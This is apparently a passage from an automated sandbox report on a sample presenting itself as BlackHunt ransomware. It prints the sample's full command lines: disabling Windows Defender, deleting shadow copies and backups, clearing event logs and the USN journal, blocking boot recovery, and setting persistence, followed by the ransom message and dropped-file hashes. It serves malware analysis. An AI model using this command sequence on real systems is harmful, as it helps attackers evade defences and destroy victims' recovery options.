                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
                                                                      2⤵
                                                                        PID:1836
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
                                                                        2⤵
                                                                          PID:2184
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
                                                                          2⤵
                                                                            PID:3872
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
                                                                            2⤵
                                                                              PID:4368
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
                                                                              2⤵
                                                                                PID:3660
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                                                                                2⤵
                                                                                  PID:2628
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                                                                                  2⤵
                                                                                    PID:1692
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
                                                                                    2⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:1176
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
                                                                                    2⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:1128
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
                                                                                    2⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:1460
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
                                                                                    2⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4300
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
                                                                                    2⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:3036
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\
                                                                                    2⤵
                                                                                      PID:5104
                                                                                      • C:\Windows\system32\fsutil.exe
                                                                                        fsutil usn deletejournal /D M:\
                                                                                        3⤵
                                                                                          PID:6836
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
                                                                                        2⤵
                                                                                          PID:6296
                                                                                          • C:\Windows\system32\wevtutil.exe
                                                                                            wevtutil.exe cl Security
                                                                                            3⤵
                                                                                            • Clears Windows event logs
                                                                                            PID:5808
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
                                                                                          2⤵
                                                                                            PID:4672
                                                                                            • C:\Windows\system32\wbadmin.exe
                                                                                              wbadmin.exe delete catalog -quiet
                                                                                              3⤵
                                                                                              • Deletes backup catalog
                                                                                              PID:13008
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
                                                                                            2⤵
                                                                                            • Modifies Windows Defender Real-time Protection settings
                                                                                            PID:2976
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
                                                                                              3⤵
                                                                                                PID:6604
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
                                                                                              2⤵
                                                                                                PID:6888
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
                                                                                                  3⤵
                                                                                                    PID:3004
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe"
                                                                                                  2⤵
                                                                                                    PID:6256
                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                      ping 127.0.0.1 -n 5
                                                                                                      3⤵
                                                                                                      • Runs ping.exe
                                                                                                      PID:5172
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta
                                                                                                    2⤵
                                                                                                      PID:6300
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
                                                                                                      2⤵
                                                                                                        PID:6288
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f
                                                                                                        2⤵
                                                                                                          PID:5164
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
                                                                                                          2⤵
                                                                                                            PID:11076
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
                                                                                                            2⤵
                                                                                                              PID:11136
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
                                                                                                              2⤵
                                                                                                                PID:6996
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                                2⤵
                                                                                                                  PID:9872
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
                                                                                                                  2⤵
                                                                                                                    PID:9548
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                                    2⤵
                                                                                                                      PID:9516
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
                                                                                                                      2⤵
                                                                                                                        PID:9108
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
                                                                                                                        2⤵
                                                                                                                          PID:6684
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false
                                                                                                                          2⤵
                                                                                                                            PID:4324
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
                                                                                                                            2⤵
                                                                                                                              PID:4460
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
                                                                                                                              2⤵
                                                                                                                                PID:10136
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
                                                                                                                                2⤵
                                                                                                                                  PID:10040
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\
                                                                                                                                  2⤵
                                                                                                                                    PID:8932
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\
                                                                                                                                    2⤵
                                                                                                                                      PID:10760
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
                                                                                                                                    1⤵
                                                                                                                                    • Modifies registry class
                                                                                                                                    PID:4740
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                                                                                                                                    1⤵
                                                                                                                                      PID:4924
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
                                                                                                                                      1⤵
                                                                                                                                        PID:8568
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                                                                                                        1⤵
                                                                                                                                          PID:11272
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
                                                                                                                                          1⤵
                                                                                                                                            PID:11028
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
                                                                                                                                            1⤵
                                                                                                                                              PID:8552
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
                                                                                                                                              1⤵
                                                                                                                                                PID:6592
                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
                                                                                                                                                1⤵
                                                                                                                                                  PID:12460
                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
                                                                                                                                                  1⤵
                                                                                                                                                    PID:12444
                                                                                                                                                  • C:\Windows\system32\bcdedit.exe
                                                                                                                                                    bcdedit /set {default} recoveryenabled No
                                                                                                                                                    1⤵
                                                                                                                                                    • Modifies boot configuration data using bcdedit
                                                                                                                                                    PID:6616
                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                    vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
                                                                                                                                                    1⤵
                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                    PID:10732
                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                    vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                                                                                                                                                    1⤵
                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                    PID:9316
                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                    vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                                                                                                                                                    1⤵
                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                    PID:10924
                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                    SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe" /F
                                                                                                                                                    1⤵
                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                    PID:11284
                                                                                                                                                  • C:\Windows\system32\vssvc.exe
                                                                                                                                                    C:\Windows\system32\vssvc.exe
                                                                                                                                                    1⤵
                                                                                                                                                      PID:7548
                                                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                                                      vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                      1⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:10908
                                                                                                                                                    • C:\Windows\system32\wbengine.exe
                                                                                                                                                      "C:\Windows\system32\wbengine.exe"
                                                                                                                                                      1⤵
                                                                                                                                                        PID:12304
                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                        schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                                                                        1⤵
                                                                                                                                                          PID:10680
                                                                                                                                                        • C:\Windows\system32\fsutil.exe
                                                                                                                                                          fsutil.exe usn deletejournal /D C:
                                                                                                                                                          1⤵
                                                                                                                                                          • Deletes NTFS Change Journal
                                                                                                                                                          PID:10856
                                                                                                                                                        • C:\Windows\system32\bcdedit.exe
                                                                                                                                                          bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                                                                          1⤵
                                                                                                                                                          • Modifies boot configuration data using bcdedit
                                                                                                                                                          PID:10436
                                                                                                                                                        • C:\Windows\System32\vdsldr.exe
                                                                                                                                                          C:\Windows\System32\vdsldr.exe -Embedding
                                                                                                                                                          1⤵
                                                                                                                                                            PID:6212
                                                                                                                                                          • C:\Windows\System32\vds.exe
                                                                                                                                                            C:\Windows\System32\vds.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:8976
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
                                                                                                                                                              1⤵
                                                                                                                                                                PID:6448
                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:912
                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:12424
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:10492
                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:10452
                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:6108
                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                          reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:7580
                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                            reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:5008
                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                              reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:1128
                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                  reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                  PID:1876
                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:4760
                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:2976
                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:3484
                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                      reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                      PID:3232
                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                      reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                      PID:3904
                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                      reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                      PID:2220
                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:3484
                                                                                                                                                                                      • C:\Windows\system32\wevtutil.exe
                                                                                                                                                                                        wevtutil.exe cl Setup
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Clears Windows event logs
                                                                                                                                                                                        PID:10232
                                                                                                                                                                                      • C:\Windows\system32\bcdedit.exe
                                                                                                                                                                                        bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Modifies boot configuration data using bcdedit
                                                                                                                                                                                        PID:11664
                                                                                                                                                                                      • C:\Windows\system32\wevtutil.exe
                                                                                                                                                                                        wevtutil.exe cl Security /e:false
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Clears Windows event logs
                                                                                                                                                                                        PID:11272
                                                                                                                                                                                      • C:\Windows\system32\bcdedit.exe
                                                                                                                                                                                        bcdedit /set {default} recoveryenabled No
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Modifies boot configuration data using bcdedit
                                                                                                                                                                                        PID:6020
                                                                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                        vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                                        PID:10380
                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                        schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:12216
                                                                                                                                                                                        • C:\Windows\system32\notepad.exe
                                                                                                                                                                                          notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:1984
                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                            "C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:11964
                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 11964 -s 1456
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                PID:232
                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                              REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:6452
                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:5728
                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:6364
                                                                                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                    taskkill /IM mshta.exe /f
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                    PID:12436
                                                                                                                                                                                                  • C:\Windows\system32\fsutil.exe
                                                                                                                                                                                                    fsutil.exe usn deletejournal /D C:
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Deletes NTFS Change Journal
                                                                                                                                                                                                    PID:10464
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 11964 -ip 11964
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:8240
                                                                                                                                                                                                    • C:\Windows\system32\wevtutil.exe
                                                                                                                                                                                                      wevtutil.exe cl Application
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Clears Windows event logs
                                                                                                                                                                                                      PID:9028
                                                                                                                                                                                                    • C:\Windows\system32\wevtutil.exe
                                                                                                                                                                                                      wevtutil.exe cl System
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Clears Windows event logs
                                                                                                                                                                                                      PID:9880
                                                                                                                                                                                                    • C:\Windows\system32\fsutil.exe
                                                                                                                                                                                                      fsutil usn deletejournal /D C:\
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:468
                                                                                                                                                                                                      • C:\Windows\system32\fsutil.exe
                                                                                                                                                                                                        fsutil usn deletejournal /D F:\
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:12424

                                                                                                                                                                                                        Network

                                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                        • C:\ProgramData\#BlackHunt_Private.key

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          dec7b0511f56601ee5d63c9d3b5b92db

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          5f8cd7a0df79ec9b15653b8a8961fdd6a1ff4611

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          3d7b7bef51e8456a33b1304efdf31bb3a13f1d9dd82a8f56abb57146cb875742

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          4296be7fea4f4cebac455a0513e85ce2ea5347d041c6c8379eda02938894a0f44c302834374b693219826a2ce17f765ee3bf0424a878b8d3e1a099ff26e1d341

                                                                                                                                                                                                        • C:\ProgramData\#BlackHunt_ReadMe.hta

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          12KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          77bce56ca62bb362715d826ce5483f8d

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          9df9e59c2d727679db4c000e27b5d9cb081d417d

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          45aef0aaf25be6071cf6c0a79d2763c60ed4bcb71fdd98d7f615a3156eaec208

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          60b71742cb03296df7927c943c45937521ee5838009aecfdc67bb05bc5ecc7252247c95dc0e0e0c44ddd3463a3f0b0b2be74b9fbe6d2decb184b34e441f0cc16

                                                                                                                                                                                                        • C:\ProgramData\#BlackHunt_ReadMe.hta

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          9491c3d7dffa386fe7f4e8723d0e9ab6

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          16c28f5af4cc795601940e241a68528b09f68c1a

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          21cffd8e46a3205bf273e1974a6bc5ecf82efd6ce91f947435dfd20a707f5056

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          46e842a6120674d0eafa6ea7ee3d809d6cafc6990ced800ba86b0fa0b7a12eb830b6628ef5b8ed8fb0dc5cd37ef77563251bfaf2b8e7432da3168ee6e9ad1f0f

                                                                                                                                                                                                        • F:\#BlackHunt_ReadMe.txt

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          684B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          a44432bcea79f953023fbc52fb631d30

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          b745764899f6dc59bc34a30a33a5c9a6faf2be5b

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          abe6a0415916c45273a3efcfab118ddfbf2d14728284a9de76c683df4ffbfff0

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          a5db652671aaec4630be0509b2893f7b54aa7e622fc1a24a7a9ff0545e45b1c9e781bb01e2ab7a23a826720c35918f13282717b82635a9a08001d3877a0d8d81